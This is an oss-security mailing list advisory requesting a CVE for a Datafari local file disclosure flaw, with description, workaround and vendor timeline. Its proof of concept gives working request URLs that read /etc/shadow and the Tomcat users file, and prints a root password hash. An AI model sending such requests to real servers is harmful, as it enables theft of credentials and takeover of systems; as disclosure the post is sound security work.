[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE Request: Datafari Local File Disclosure
From:       Fried Wil <wilfried.pascault () gmail ! com>
Date:       2016-02-24 15:00:57
Message-ID: CANTwUcqY-UXW+M-=urTkqtQLMQ5S6aG+kRKUdP02whyStXrQPQ () mail ! gmail ! com
[Download RAW message or body]

Hi,

I forgot to add MITRE in cc for CVE assignment.

Thanks

On Wed, Feb 3, 2016 at 10:55 AM, PASCAULT Wilfried <wpascault@lexsi.com> wrote:
> Datafari, an Open source enterprise search software using Apache Solr, ManifoldCF and Tomcat \
> is proned to a local file disclosure vulnerability. 
> Product's information
> ---------------------
> * Name : Datafari - http://www.datafari.com/
> * Editor: France Labs
> * Affected versions: 2.x<2.1.3
> * Tested : 2.1.0 and 2.1.1 on Debian Wheezy 7 and Jesse 8
> 
> Description
> -----------
> When "filesystem" repository has been configured into Datafari (administrative privileges on \
> Datafari required), a user could access to any file of the system with root privileges. 
> On "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" configuration file, \
> "ALLOWLOCALFILEREADING" parameter allows by default to read file on system. 
> Datafari is by default running as user root, so any file could be downloaded with \
> "url=file:/" parameter in "/Datafari/URL" (token isn't checked). 
> This issue is exploitable only when "Filesystem" repository has been set on ManifoldCF.
> 
> Proof of concept
> ----------------
> http://localhost:8080/Datafari/URL?url=file:/arbitrary_file
> 
> http://localhost:8080/Datafari/URL?url=file:/etc/shadow
> => file will be downloaded as _etc_shadow
> 
> $ head _etc_shadow
> root:$6$nTTh32TT$rLqcSGDf92tyh9aXtuTqnlGW4Ewr.IzBEcdP/kMnvhNYELz7iUgmOyiWesbJRUwEeKdKk/2yQcnAVBQYBGsiD.:16714:0:99999:7:::
>  daemon:*:16714:0:99999:7:::
> bin:*:16714:0:99999:7:::
> sys:*:16714:0:99999:7:::
> sync:*:16714:0:99999:7:::
> games:*:16714:0:99999:7:::
> man:*:16714:0:99999:7:::
> lp:*:16714:0:99999:7:::
> mail:*:16714:0:99999:7:::
> news:*:16714:0:99999:7:::
> 
> another funny file ^_^ (Tomcat manager password could not be changed during installation)
> http://localhost:8080/Datafari/URL?url=file://opt/datafari/tomcat/conf/tomcat-users.xml
> $ cat _opt_datafari_tomcat_conf_tomcat-users.xml|grep admin
> <user password="@PASSWORD@" roles="manager-gui,SearchAdministrator" username="admin"/>
> 
> http://localhost:8080/manager/html/list
> 
> 
> Workaround
> ----------
> Set "ALLOWLOCALFILEREADING=false" on "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" \
> and restart Datafari 
> Timeline
> --------
> 1/6/2016: reported to vendor
> 1/11/2016: vendor response but said was not a security issue
> 1/11/2016: add technical details and POC
> 1/11/2016: vendor acknowledged as a security issue
> 1/11/2016: patch was commited in master branch
> 1/28/2016: 2.1.3 released
> 
> Thanks to Cédric and Aurélien from Datafari project for their quick replies.



-- 
Wilfried Pascault
+1 514 430 7201
wilfried.pascault@gmail.com


[prev in list] [next in list] [prev in thread] [next in thread]